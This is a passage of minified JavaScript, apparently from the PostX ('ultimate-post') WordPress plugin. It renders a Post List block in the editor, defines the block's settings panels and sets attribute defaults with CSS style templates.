2","ultimate-post"),value:"layout2",pro:!0},{img:"assets/img/layouts/pl4/l3.png",label:__("Layout 3","ultimate-post"),value:"layout3",pro:!0},{img:"assets/img/layouts/pl4/l4.png",label:__("Layout 4","ultimate-post"),value:"layout4",pro:!0}]},{type:"feat_toggle",label:__("Post List Features","ultimate-post"),new:a.KE,[Je?"exclude":"dep"]:a.N2}],store:lt}),(0,o.createElement)(T,null,(0,o.createElement)(x.ZP,{store:lt})),(0,o.createElement)("div",at,ot&&(0,o.createElement)("style",{dangerouslySetInnerHTML:{__html:ot}}),(0,o.createElement)("div",{className:"ultp-block-wrapper"},(Fe||We||De)&&(0,o.createElement)(r.m,{attributes:O,setAttributes:N,onClick:()=>{Qe("heading"),et("heading")},setSection:Qe,setToolbarSettings:et}),function(){const e=`${Te}`,t=(e,t)=>(0,h.o6)()&&je&&(0,o.createElement)(k.Z,{idx:e,postId:t,fields:Ze,settingsOnClick:(e,t)=>{e?.stopPropagation(),et(t)},selectedDC:l.selectedDC,setSelectedDc:Ye,setAttributes:N,dcFields:Ze});return l.error?(0,o.createElement)(I,{label:__("Posts are not available.","ultimate-post")},(0,o.createElement)("div",{style:{marginBottom:15}},__("Make sure Add Post.","ultimate-post"))):l.loading?(0,o.createElement)(I,{className:"ultp-backend-block-loading",label:__("Loading…","ultimate-post")},(0,o.createElement)(L,null)):l.postsList.length>0?(0,o.createElement)("div",{className:`ultp-block-items-wrap ultp-block-content-${ve} ultp-block-content-${he} ultp-${ke}`},l.postsList.map(((l,a)=>{const r=0==a?JSON.parse(ce.replaceAll("u0022",'"')):JSON.parse(ue.replaceAll("u0022",'"'));return(0,o.createElement)(e,{key:a,className:`ultp-block-item ultp-block-media post-id-${l.ID}`},(0,o.createElement)("div",{className:"ultp-block-content-wrap "+(0===a?"ultp-first-postlist-2":"ultp-all-postlist-2")},(0,o.createElement)(s.qI,{imgOverlay:pe,imgOverlayType:se,imgAnimation:re,post:l,fallbackEnable:Ue,vidIconEnable:Me,showImage:ee,idx:a,imgCrop:G,imgCropSmall:q,layout:ke,onClick:()=>{Qe("image"),et("image")},Video:Me&&l.has_video?(0,o.createElement)(s.nk,{onClick:()=>{Qe("video"),et("video")}}):null,Category:(Q&&0==a||de)&&"aboveTitle"!=ae?(0,o.createElement)("div",{className:"ultp-category-img-grid"},(0,o.createElement)(i.Z,{post:l,catShow:Q,catStyle:oe,catPosition:ae,customCatColor:we,onlyCatColor:xe,onClick:e=>{Qe("taxonomy-/-category"),et("cat")}})):null}),(0,o.createElement)("div",{className:"ultp-block-content"},t(7,l.ID),"aboveTitle"==ae&&(0==a||de)&&(0,o.createElement)(i.Z,{post:l,catShow:Q,catStyle:oe,catPosition:ae,customCatColor:we,onlyCatColor:xe,onClick:e=>{Qe("taxonomy-/-category"),et("cat")}}),t(6,l.ID),l.title&&le&&1==ie&&(0,o.createElement)(g.Z,{title:l.title,headingTag:_e,titleLength:Ee,titleStyle:Le,onClick:e=>{Qe("title"),et("title")}}),t(5,l.ID),(0==a||J)&&X&&"top"==fe&&(0,o.createElement)(c.Z,{meta:r,post:l,metaSeparator:te,metaStyle:Y,metaMinText:Se,metaAuthorPrefix:Pe,metaDateFormat:Ie,authorLink:Be,onClick:e=>{Qe("meta"),et("meta")}}),t(4,l.ID),l.title&&le&&0==ie&&(0,o.createElement)(g.Z,{title:l.title,headingTag:_e,titleLength:Ee,titleStyle:Le,onClick:e=>{Qe("title"),et("title")}}),t(3,l.ID),(0==a||be)&&ne&&(0,o.createElement)(n.Z,{excerpt:l.excerpt,excerpt_full:l.excerpt_full,seo_meta:l.seo_meta,excerptLimit:$,showFullExcerpt:K,showSeoMeta:Ce,onClick:e=>{Qe("excerpt"),et("excerpt")}}),t(2,l.ID),(0==a||ye)&&me&&(0,o.createElement)(m.Z,{readMoreText:ge,readMoreIcon:V,titleLabel:l.title,onClick:()=>{Qe("read-more"),et("read-more")}}),t(1,l.ID),(0==a||J)&&X&&"bottom"==fe&&(0,o.createElement)(c.Z,{meta:r,post:l,metaSeparator:te,metaStyle:Y,metaMinText:Se,metaAuthorPrefix:Pe,metaDateFormat:Ie,authorLink:Be,onClick:e=>{Qe("meta"),et("meta")}}),t(0,l.ID),(0,h.o6)()&&je&&(0,o.createElement)(f.Z,{dcFields:Ze,setAttributes:N,startOnboarding:Xe}))))}))):(0,o.createElement)(I,{className:"ultp-backend-block-loading",label:Ae})}(),De&&"loadMore"==Ve&&(0,o.createElement)(p.Z,{loadMoreText:$e,onClick:e=>{Qe("pagination"),et("pagination")}}),De&&"navigation"==Ve&&"topRight"!=Ge&&(0,o.createElement)(u.Z,{onClick:()=>{Qe("pagination"),et("pagination")}}),De&&"pagination"==Ve&&(0,o.createElement)(d.Z,{paginationNav:qe,paginationAjax:ze,paginationText:Ke,onClick:e=>{Qe("pagination"),et("pagination")}}))))}},11162:(e,t,l)=>{"use strict";l.d(t,{FP:()=>v,PR:()=>y,ZP:()=>b});var o=l(67294),a=l(53049),i=l(38156),n=l(13448),r=l(32258),s=l(87282),p=l(92637),c=l(43581),u=l(69735),d=l(82473),m=l(87025);const{__}=wp.i18n,{useEffect:g}=wp.element,y=8,b=e=>{const{store:t}=e,{layout:l,queryType:n,advFilterEnable:r,advPaginationEnable:u,V4_1_0_CompCheck:{runComp:d}}=t.attributes,{context:y,section:b,settingTab:v,setSettingTab:h}=t;return g((()=>{(0,m.CH)(y,r,t,u)}),[r,u,t.clientId]),(0,o.createElement)(o.Fragment,null,(0,o.createElement)(c.default,{prev:"https://www.wpxpo.com/postx/blocks/#demoid6839",store:t}),(0,o.createElement)(p.Sections,{settingTab:v,setSettingTab:h},(0,o.createElement)(p.Section,{slug:"sorting",title:__("Post Sorting","ultimate-post")},(0,o.createElement)(a.lA,{title:"inline",initialOpen:!0,store:t}),(0,o.createElement)(a.T,{initialOpen:!1,store:t,title:__("Include","ultimate-post"),include:s.fL}),(0,o.createElement)(a.T,{initialOpen:!1,store:t,title:__("Exclude","ultimate-post"),include:s.M6}),(0,o.createElement)(a.T,{initialOpen:!1,store:t,title:__("inline","ultimate-post"),include:[{position:1,data:{type:"select",key:"queryUnique",label:__("Unique Content Group (Frontend Only)","ultimate-post"),pro:!0,options:[{value:"",label:__("Disable","ultimate-post")},{value:"group1",label:__("Content Group 1","ultimate-post")},{value:"group2",label:__("Content Group 2","ultimate-post")},{value:"group3",label:__("Content Group 3","ultimate-post")},{value:"group4",label:__("Content Group 4","ultimate-post")},{value:"group5",label:__("Content Group 5","ultimate-post")}],help:__("Unique Content Group solves the repetition of posts on multiple blocks.[Frontend Only]","ultimate-post")}}]})),(0,o.createElement)(p.Section,{slug:"setting",title:__("Settings","ultimate-post")},(0,o.createElement)(a.cA,{store:t,initialOpen:b.general,dynamicHelpText:{select:{key:"queryQuick",popular_post_1_day_view:"- Most viewed posts published in the last 24 hours",popular_post_7_days_view:"- Most viewed posts published in the last 7 days",popular_post_30_days_view:"- Most viewed posts published in the last 30 days",popular_post_all_times_view:"- Most viewed posts of all time"}},exclude:["columns","columnGridGap"],include:[{position:0,data:{type:"layout",block:"post-list-4",key:"layout",label:__("Layout","ultimate-post"),options:[{img:"assets/img/layouts/pl4/l1.png",label:__("Layout 1","ultimate-post"),value:"layout1",pro:!1},{img:"assets/img/layouts/pl4/l2.png",label:__("Layout 2","ultimate-post"),value:"layout2",pro:!0},{img:"assets/img/layouts/pl4/l3.png",label:__("Layout 3","ultimate-post"),value:"layout3",pro:!0},{img:"assets/img/layouts/pl4/l4.png",label:__("Layout 4","ultimate-post"),value:"layout4",pro:!0}],variation:{layout1:{counterColor:"#767676"},layout2:{counterColor:"#767676"},layout3:{counterColor:"#767676"},layout4:{counterColor:"#fff"}}}},{position:3,data:{type:"range",key:"largeHeight",min:0,max:800,step:1,unit:!0,responsive:!0,label:__("Large Image Height","ultimate-post")}},{position:4,data:{type:"range",key:"spaceLargeItem",min:0,max:100,step:1,unit:!0,responsive:!0,label:__("Large Image Space","ultimate-post")}},{position:5,data:{type:"toggle",key:"imgFlip",label:__("Image Flip","ultimate-post"),pro:!0}},{position:6,data:{type:"toggle",key:"mobileImageTop",label:__("Stack on Mobile","ultimate-post")}},{position:7,data:{type:"tag",key:"varticalAlign",label:__("Vertical Align","ultimate-post"),options:[{value:"top",label:__("Top","ultimate-post")},{value:"middle",label:__("Middle","ultimate-post")},{value:"bottom",label:__("Bottom","ultimate-post")}]}}]}),(0,o.createElement)(a.VH,{isTab:!0,store:t,depend:"titleShow",initialOpen:b.title,include:[{position:5,data:{type:"typography",key:"titleLgTypo",label:__("Typography Large Title","ultimate-post")}},{position:8,data:{type:"color",key:"lgTitleColor",label:__("Large Title Color","ultimate-post")}},{position:9,data:{type:"color",key:"lgTitleHoverColor",label:__("Large Title Hover Color","ultimate-post")}}],hrIdx:[4,12]}),(0,o.createElement)(a.Hn,{isTab:!0,store:t,initialOpen:b.image,include:[{position:3,data:{type:"range",key:"imgSpacing",label:__("Img Spacing","ultimate-post"),min:0,max:100,step:1,responsive:!0}},{data:{type:"toggle",key:"fallbackEnable",label:__("Fallback Image Enable","ultimate-post")}},{data:{type:"media",key:"fallbackImg",label:__("Fallback Image","ultimate-post")}}],exclude:["imgMargin"],hrIdx:[{tab:"settings",hr:[3,11]},{tab:"style",hr:[4]}]}),(0,o.createElement)(a.Yk,{isTab:!0,store:t,depend:"metaShow",initialOpen:b.meta,include:[{position:0,data:{tab:"settings",type:"toggle",key:"showSmallMeta",label:__("Small Item Meta","ultimate-post")}},{position:1,data:a.do},{position:3,data:a.Rd},{position:4,data:a.WD},{position:7,data:a.MF},{position:13,data:{tab:"style",type:"color",key:"lgMetaHoverColor",label:__("Large Meta Hover Color","ultimate-post")}}],exclude:["metaSeparator","metaStyle","metaList","metaListSmall"],hrIdx:[{tab:"settings",hr:[4]},{tab:"style",hr:[7]}]}),(0,o.createElement)(a.Bq,{isTab:!0,initialOpen:b["taxonomy-/-category"],depend:"catShow",store:t,include:[{position:0,data:{tab:"settings",type:"toggle",key:"showSmallCat",label:__("Small Item Category","ultimate-post")}},{position:1,data:a.WJ}],exclude:["catPosition"],hrIdx:[{tab:"style",hr:[8]}]}),(0,o.createElement)(a.X_,{isTab:!0,depend:"excerptShow",initialOpen:b.excerpt,store:t,include:[{position:1,data:{type:"toggle",key:"showFullExcerptLg",label:__("Show Full Excerpt (Large Post)","ultimate-post")}},{position:2,data:{type:"range",key:"excerptLimitLg",label:__("Large Post Excerpt Limit","ultimate-post"),min:0,max:500,step:1,help:__("Excerpt Limit from Post Content.","ultimate-post")}},{position:4,data:{type:"toggle",key:"showSmallExcerpt",label:__("Show Small Excerpt","ultimate-post")}}],hrIdx:[6,9]}),(0,o.createElement)(a.oY,{isTab:!0,store:t,initialOpen:b["read-more"],depend:"readMore",include:[{position:0,data:{tab:"settings",type:"toggle",key:"showSmallBtn",label:__("Small Item Read More","ultimate-post")}}]}),(0,o.createElement)(a.rS,{initialOpen:b.video,depend:"vidIconEnable",store:t}),(0,o.createElement)(a.Yp,{depend:"separatorShow",store:t}),(0,o.createElement)(a.O2,{store:t,include:[{position:0,data:{type:"color",key:"overlayImgBg",label:__("Overlay Content Background Color","ultimate-post")}},{position:11,data:{type:"dimension",key:"lgContentPadding",label:__("Large Content Padding","ultimate-post"),step:1,unit:!0,responsive:!0}}],exclude:["contenWraptWidth","contenWraptHeight"]}),("layout3"===l||"layout4"===l)&&(0,o.createElement)(a.wT,{store:t}),!d&&(0,o.createElement)(i.Z,{open:b.filter||b.pagination||b.heading},(0,o.createElement)(a.Wh,{isTab:!0,store:t,initialOpen:b.heading,depend:"headingShow",hrIdx:[{tab:"settings",hr:[{idx:1,label:__("Heading Settings","ultimate-posts")},{idx:8,label:__("Subheading Settings","ultimate-posts")}]},{tab:"style",hr:[{idx:1,label:__("Heading Style","ultimate-posts")},{idx:12,label:__("Subheading Style","ultimate-posts")}]}]}),"posts"!=n&&"customPosts"!=n&&(0,o.createElement)(a.B0,{isTab:!0,store:t,initialOpen:b.filter,depend:"filterShow",include:[{position:1,data:a.YA},{position:2,data:a.sx}],exclude:["filterType","filterValue"],hrIdx:[{tab:"settings",hr:[5]},{tab:"style",hr:[4,9]}]}),(0,o.createElement)(a.ng,{isTab:!0,initialOpen:b.pagination,depend:"paginationShow",store:t,include:[{position:1,data:{type:"select",key:"paginationType",label:__("Pagination Type","ultimate-post"),pro:!0,options:[{value:"loadMore",label:__("Load More","ultimate-post")},{value:"navigation",label:__("Navigation","ultimate-post")},{value:"pagination",label:__("Pagination","ultimate-post")}]}}],exclude:["paginationType"]}))),(0,o.createElement)(p.Section,{slug:"advanced",title:__("Advanced","ultimate-post")},(0,o.createElement)(a.yB,{initialOpen:!0,store:t,include:[{position:2,data:{type:"color",key:"loadingColor",label:__("Loading Color","ultimate-post"),pro:!0}}]}),(0,o.createElement)(a.Mg,{store:t}),(0,o.createElement)(a.iv,{store:t}))),(0,a.dH)())};function v({selected:e,store:t}){const{V4_1_0_CompCheck:{runComp:l}}=t.attributes,{metaShow:i,showImage:s,titleShow:p,catPosition:c,titlePosition:m,excerptShow:g,readMore:y,metaPosition:b,layout:v,fallbackEnable:h,catShow:f}=t.attributes,k=[i&&"bottom"==b,y,g,p&&0==m,i&&"top"==b,p&&1==m,f&&"aboveTitle"==c];if((0,u.o6)()&&e.startsWith("dc_"))return(0,o.createElement)(d.Z,{store:t,selected:e,layoutContext:k});switch(e){case"filter":return l?null:(0,o.createElement)(r.Z,{text:"Filter"},(0,o.createElement)(a.sT,{store:t,attrKey:"fliterTypo",label:__("Filter Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.Eo)({include:["fliterSpacing","fliterPadding"],exclude:"__all",title:__("Filter Spacing","ultimate-post")}),store:t,label:__("Filter Spacing","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Filter Settings","ultimate-post"),styleTitle:__("Filter Style","ultimate-post"),settingsKeys:a.Df,styleKeys:a.YF,oArgs:a.rx,incSettings:[{position:1,data:a.YA},{position:2,data:a.sx}],exSettings:["filterType","filterValue"],exStyle:["fliterTypo","fliterSpacing","fliterPadding"]}));case"heading":return l?null:(0,o.createElement)(r.Z,{text:"Heading"},(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Heading Settings","ultimate-post"),styleTitle:__("Heading Style","ultimate-post"),settingsKeys:a.cM,styleKeys:a.J5,oArgs:a.ii}));case"pagination":return l?null:(0,o.createElement)(r.Z,{text:"Pagination"},(0,o.createElement)(a.sT,{store:t,attrKey:"pagiTypo",label:__("Pagination Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.DU)({include:["pagiMargin","pagiPadding"],exclude:"__all",title:__("Pagination Spacing","ultimate-post")}),store:t,label:__("Pagination Spacing","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Pagination Settings","ultimate-post"),styleTitle:__("Pagination Style","ultimate-post"),settingsKeys:a.V2,styleKeys:a.xd,oArgs:a.YZ,incSettings:[{position:1,data:{type:"select",key:"paginationType",label:__("Pagination Type","ultimate-post"),pro:!0,options:[{value:"loadMore",label:__("Load More","ultimate-post")},{value:"navigation",label:__("Navigation","ultimate-post")},{value:"pagination",label:__("Pagination","ultimate-post")}]}}],exSettings:["paginationType"],exStyle:["pagiTypo","pagiMargin","pagiPadding"]}));case"video":return(0,o.createElement)(r.Z,{text:"Video"},(0,o.createElement)(n.Z,{buttonContent:a.gA,include:(0,a.q7)({include:a.JA,exclude:"__all",title:__("Video Icon Color","ultimate-post")}),store:t,label:__("Video Icon Color","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HU,include:(0,a.q7)({exclude:a.JA}),store:t,label:__("Video Settings","ultimate-post")}));case"title":return(0,o.createElement)(r.Z,{text:"Title"},(0,o.createElement)(n.Z,{buttonContent:a.tj,include:(0,a.Wf)({include:["titleTypo",{data:{type:"typography",key:"titleLgTypo",label:__("Typography Large Title","ultimate-post")}}],exclude:"__all",title:__("Title Typography","ultimate-post")}),store:t,label:__("Title Color","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.gA,include:(0,a.Wf)({include:["titleColor","titleHoverColor","titleBackground",{position:3,data:{type:"color",key:"lgTitleColor",label:__("Large Title Color","ultimate-post")}},{position:4,data:{type:"color",key:"lgTitleHoverColor",label:__("Large Title Hover Color","ultimate-post")}}],exclude:"__all",title:__("Title Color","ultimate-post")}),store:t,label:__("Title Color","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HU,include:(0,a.Wf)({exclude:["titleTypo","titleColor","titleHoverColor","titleBackground"],title:__("Title Settings","ultimate-post")}),store:t,label:__("Title Settings","ultimate-post")}));case"excerpt":return(0,o.createElement)(r.Z,{text:"Excerpt"},(0,o.createElement)(a.sT,{store:t,attrKey:"excerptTypo",label:__("Excerpt Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.gA,include:(0,a.BO)({include:["excerptColor"],exclude:"__all",title:__("Excerpt Color","ultimate-post")}),store:t,label:__("Excerpt Color","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HU,include:(0,a.BO)({exclude:["excerptTypo","excerptColor"],title:__("Excerpt Settings","ultimate-post"),include:[{position:1,data:{type:"toggle",key:"showFullExcerptLg",label:__("Show Full Excerpt (Large Post)","ultimate-post")}},{position:2,data:{type:"range",key:"excerptLimitLg",label:__("Large Post Excerpt Limit","ultimate-post"),min:0,max:500,step:1,help:__("Excerpt Limit from Post Content.","ultimate-post")}},{position:4,data:{type:"toggle",key:"showSmallExcerpt",label:__("Show Small Excerpt","ultimate-post")}}]}),store:t,label:__("Excerpt Settings","ultimate-post")}));case"meta":return(0,o.createElement)(r.Z,{text:"Meta"},(0,o.createElement)(a.sT,{store:t,attrKey:"metaTypo",label:__("Meta Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.cr)({include:["metaSpacing","metaMargin","metaPadding"],exclude:"__all",title:__("Meta Spacing","ultimate-post")}),store:t,label:__("Meta Spacing","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.Cz,include:(0,a.cr)({include:a._y,exclude:"__all",title:__("Meta Texts","ultimate-post")}),store:t,label:__("Meta Texts","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Meta Settings","ultimate-post"),styleTitle:__("Meta Style","ultimate-post"),settingsKeys:a.G7,styleKeys:a.hd,oArgs:a.jK,incSettings:[{position:0,data:{type:"toggle",key:"showSmallMeta",label:__("Small Item Meta","ultimate-post")}},{position:1,data:a.do},{position:3,data:a.Rd},{position:4,data:a.WD},{position:7,data:a.MF}],incStyle:[{position:4,data:{type:"color",key:"lgMetaHoverColor",label:__("Large Meta Hover Color","ultimate-post")}}],exSettings:["metaSeparator","metaStyle","metaList","metaListSmall"],exStyle:["metaTypo","metaMargin","metaPadding","metaSpacing"]}));case"read-more":return(0,o.createElement)(r.Z,{text:"Read More"},(0,o.createElement)(a.sT,{store:t,attrKey:"readMoreTypo",label:__("Read More Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.NJ)({include:["readMoreSacing","readMorePadding"],exclude:"__all",title:__("Read More Spacing","ultimate-post")}),store:t,label:__("Read More Spacing","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Read More Settings","ultimate-post"),styleTitle:__("Read More Style","ultimate-post"),settingsKeys:a.qM,styleKeys:a.ad,oArgs:a.e5,exStyle:["readMoreTypo","readMoreSacing","readMorePadding"],incSettings:[{position:0,data:{type:"toggle",key:"showSmallBtn",label:__("Small Item Read More","ultimate-post")}}]}));case"cat":return(0,o.createElement)(r.Z,{text:"Taxonomy/Category"},(0,o.createElement)(a.sT,{store:t,attrKey:"catTypo",label:__("Category Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.v9)({include:["catSacing","catPadding"],exclude:"__all",title:__("Category Spacing","ultimate-post")}),store:t,label:__("Category Spacing","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Category Settings","ultimate-post"),styleTitle:__("Category Style","ultimate-post"),settingsKeys:a.eC,styleKeys:a.EK,oArgs:a.op,exSettings:["catPosition"],exStyle:["catTypo","catSacing","catPadding"],incSettings:[{position:0,data:{type:"toggle",key:"showSmallCat",label:__("Small Item Category","ultimate-post")}},{position:1,data:a.WJ}]}));case"image":return(0,o.createElement)(r.Z,{text:"Image"},(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Image Settings","ultimate-post"),styleTitle:__("Image Style","ultimate-post"),settingsKeys:a.pj,styleKeys:a.hH,oArgs:a.Po,exStyle:["imgMargin"],incSettings:[{data:{type:"toggle",key:"fallbackEnable",label:__("Fallback Image Enable","ultimate-post")}},{data:{type:"media",key:"fallbackImg",label:__("Fallback Image","ultimate-post")}}],incStyle:[{position:0,data:{type:"range",key:"imgSpacing",label:__("Img Spacing","ultimate-post"),min:0,max:100,step:1,responsive:!0}}]}));default:return null}}},44371:(e,t,l)=>{"use strict";l.d(t,{Z:()=>n});var o=l(92165),a=l(73151),i=l(51579);const n={blockId:{type:"string",default:""},previewImg:{type:"string",default:""},currentPostId:{type:"string",default:""},layout:{type:"string",default:"layout1"},largeHeight:{type:"object",default:{lg:"100",unit:"%"},style:[{selector:"{{ULTP}} .ultp-block-item:first-child .ultp-block-image img { width: 100%; object-fit: cover; height: {{largeHeight}}; }"}]},spaceLargeItem:{type:"object",default:{lg:"60",xs:"40",unit:"px"},style:[{selector:"{{ULTP}} .ultp-block-item:first-child { margin-bottom: {{spaceLargeItem}};}"}]},headingShow:{type:"boolean",default:!0},excerptShow:{type:"boolean",default:!0},showImage:{type:"boolean",default:!0},filterShow:{type:"boolean",default:!1,style:[{depends:[{key:"queryType",condition:"!=",value:["posts","customPosts"]}]}]},paginationShow:{type:"boolean",default:!0},contentTag:{type:"string",default:"div"},openInTab:{type:"boolean",default:!1},notFoundMessage:{type:"string",default:"No Post Found"},titleShow:{type:"boolean",default:!0},titleStyle:{type:"string",default:"none"},titleAnimColor:{type:"string",default:"var(--postx_preset_Contrast_3_color)",style:[{depends:[{key:"titleStyle",condition:"==",value:"style1"}],selector:"{{ULTP}} .ultp-title-style1 a {  cursor: pointer; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.35s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 0px 2px; background-repeat: no-repeat; background-position: left 100%; }"},{depends:[{key:"titleStyle",condition:"==",value:"style2"}],selector:"{{ULTP}} .ultp-title-style2 a:hover {  border-bottom:none; padding-bottom: 2px; background-position:0 100%; background-repeat: repeat; background-image: url(\"data:image/svg+xml;charset=utf8,%3Csvg id='squiggle-link' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' xmlns:ev='http://www.w3.org/2001/xml-events' viewBox='0 0 10 18'%3E%3Cstyle type='text/css'%3E.squiggle%7Banimation:shift .5s linear infinite;%7D@keyframes shift %7Bfrom %7Btransform:translateX(-10px);%7Dto %7Btransform:translateX(0);%7D%7D%3C/style%3E%3Cpath fill='none' stroke='{{titleAnimColor}}' stroke-width='1' class='squiggle' d='M0,17.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5' /%3E%3C/svg%3E\"); }"},{depends:[{key:"titleStyle",condition:"==",value:"style3"}],selector:"{{ULTP}} .ultp-title-style3 a {  text-decoration: none; $thetransition: all 1s cubic-bezier(1,.25,0,.75) 0s; position: relative; transition: all 0.35s ease-out; padding-bottom: 3px; border-bottom:none; padding-bottom: 2px; background-position:0 100%; background-repeat: repeat; background-image: url(\"data:image/svg+xml;charset=utf8,%3Csvg id='squiggle-link' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' xmlns:ev='http://www.w3.org/2001/xml-events' viewBox='0 0 10 18'%3E%3Cstyle type='text/css'%3E.squiggle%7Banimation:shift .5s linear infinite;%7D@keyframes shift %7Bfrom %7Btransform:translateX(-10px);%7Dto %7Btransform:translateX(0);%7D%7D%3C/style%3E%3Cpath fill='none' stroke='{{titleAnimColor}}' stroke-width='1' class='squiggle' d='M0,17.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5' /%3E%3C/svg%3E\"); }"},{depends:[{key:"titleStyle",condition:"==",value:"style4"}],selector:"{{ULTP}} .ultp-title-style4 a { cursor: pointer; font-weight: 600; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.3s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 100% 2px; background-repeat: no-repeat; background-position: left 100%; }"},{depends:[{key:"titleStyle",condition:"==",value:"style5"}],selector:"{{ULTP}} .ultp-title-style5 a:hover{ text-decoration: none; transition: all 0.35s ease-out; border-bottom:none; padding-bottom: 2px; background-position:0 100%; background-repeat: repeat; background-size:auto; background-image: url(\"data:image/svg+xml;charset=utf8,%3Csvg id='squiggle-link' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' xmlns:ev='http://www.w3.org/2001/xml-events' viewBox='0 0 10 18'%3E%3Cstyle type='text/css'%3E.squiggle%7Banimation:shift .5s linear infinite;%7D@keyframes shift %7Bfrom %7Btransform:translateX(-10px);%7Dto %7Btransform:translateX(0);%7D%7D%3C/style%3E%3Cpath fill='none' stroke='{{titleAnimColor}}' stroke-width='1' class='squiggle' d='M0,17.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5' /%3E%3C/svg%3E\"); } "},{depends:[{key:"titleStyle",condition:"==",value:"style5"}],selector:"{{ULTP}} .ultp-title-style5 a { cursor: pointer; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.3s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 100% 2px; background-repeat: no-repeat; background-position: left 100%; }"},{depends:[{key:"titleStyle",condition:"==",value:"style6"}],selector:"{{ULTP}} .ultp-title-style6 a { background-image: linear-gradient(120deg, {{titleAnimColor}} 0%, {{titleAnimColor}} 100%); background-repeat: no-repeat; background-size: 100% 2px; background-position: 0 88%; transition: background-size 0.15s ease-in; padding: 5px 5px; }"},{depends:[{key:"titleStyle",condition:"==",value:"style7"}],selector:"{{ULTP}} .ultp-title-style7 a { cursor: pointer; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.3s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 0px 2px; background-repeat: no-repeat; background-position: right 100%; } "},{depends:[{key:"titleStyle",condition:"==",value:"style8"}],selector:"{{ULTP}} .ultp-title-style8 a { cursor: pointer; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.3s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 0px 2px; background-repeat: no-repeat; background-position: center 100%; } "},{depends:[{key:"titleStyle",condition:"==",value:"style9"}],selector:"{{ULTP}} .ultp-title-style9 a { background-image: linear-gradient(120deg,{{titleAnimColor}} 0%, {{titleAnimColor}} 100%); background-repeat: no-repeat; background-size: 100% 10px; background-position: 0 88%; transition: 0.3s ease-in; padding: 3px 5px; } "}]},titleTag:{type:"string",default:"h3"},titlePosition:{type:"boolean",default:!0},titleColor:{type:"string",default:"var(--postx_preset_Contrast_1_color)",style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-all-postlist-2 .ultp-block-content .ultp-block-title a { color:{{titleColor}} !important; }"}]},titleHoverColor:{type:"string",default:"var(--postx_preset_Primary_color)",style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-content .ultp-block-title a:hover { color:{{titleHoverColor}} !important; }"}]},titleLgTypo:{type:"object",default:{openTypography:1,size:{lg:"28",unit:"px"},spacing:{lg:"",unit:"px"},height:{lg:"36",unit:"px"},decoration:"none",transform:"",family:"",weight:"500"},style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item:first-child .ultp-block-title, \n          {{ULTP}} .ultp-block-item:first-child .ultp-block-title a"}]},lgTitleColor:{type:"string",default:"#fff",style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-first-postlist-2 .ultp-block-content .ultp-block-title a { color:{{lgTitleColor}} !important; }"}]},lgTitleHoverColor:{type:"string",default:"#fff",style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-first-postlist-2 .ultp-block-content .ultp-block-title a:hover { color:{{lgTitleHoverColor}} !important; }"}]},titleTypo:{type:"object",default:{openTypography:1,size:{lg:"20",unit:"px"},spacing:{lg:"0",unit:"px"},height:{lg:"28",unit:"px"},transform:"",decoration:"none",family:"",weight:"500"},style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item:not(:first-child) .ultp-block-title, \n          {{ULTP}} .ultp-block-item:not(:first-child) .ultp-block-title a"}]},titlePadding:{type:"object",default:{lg:{top:0,bottom:15,unit:"px"},xs:{top:0,bottom:10,unit:"px"}},style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-title { padding:{{titlePadding}}; 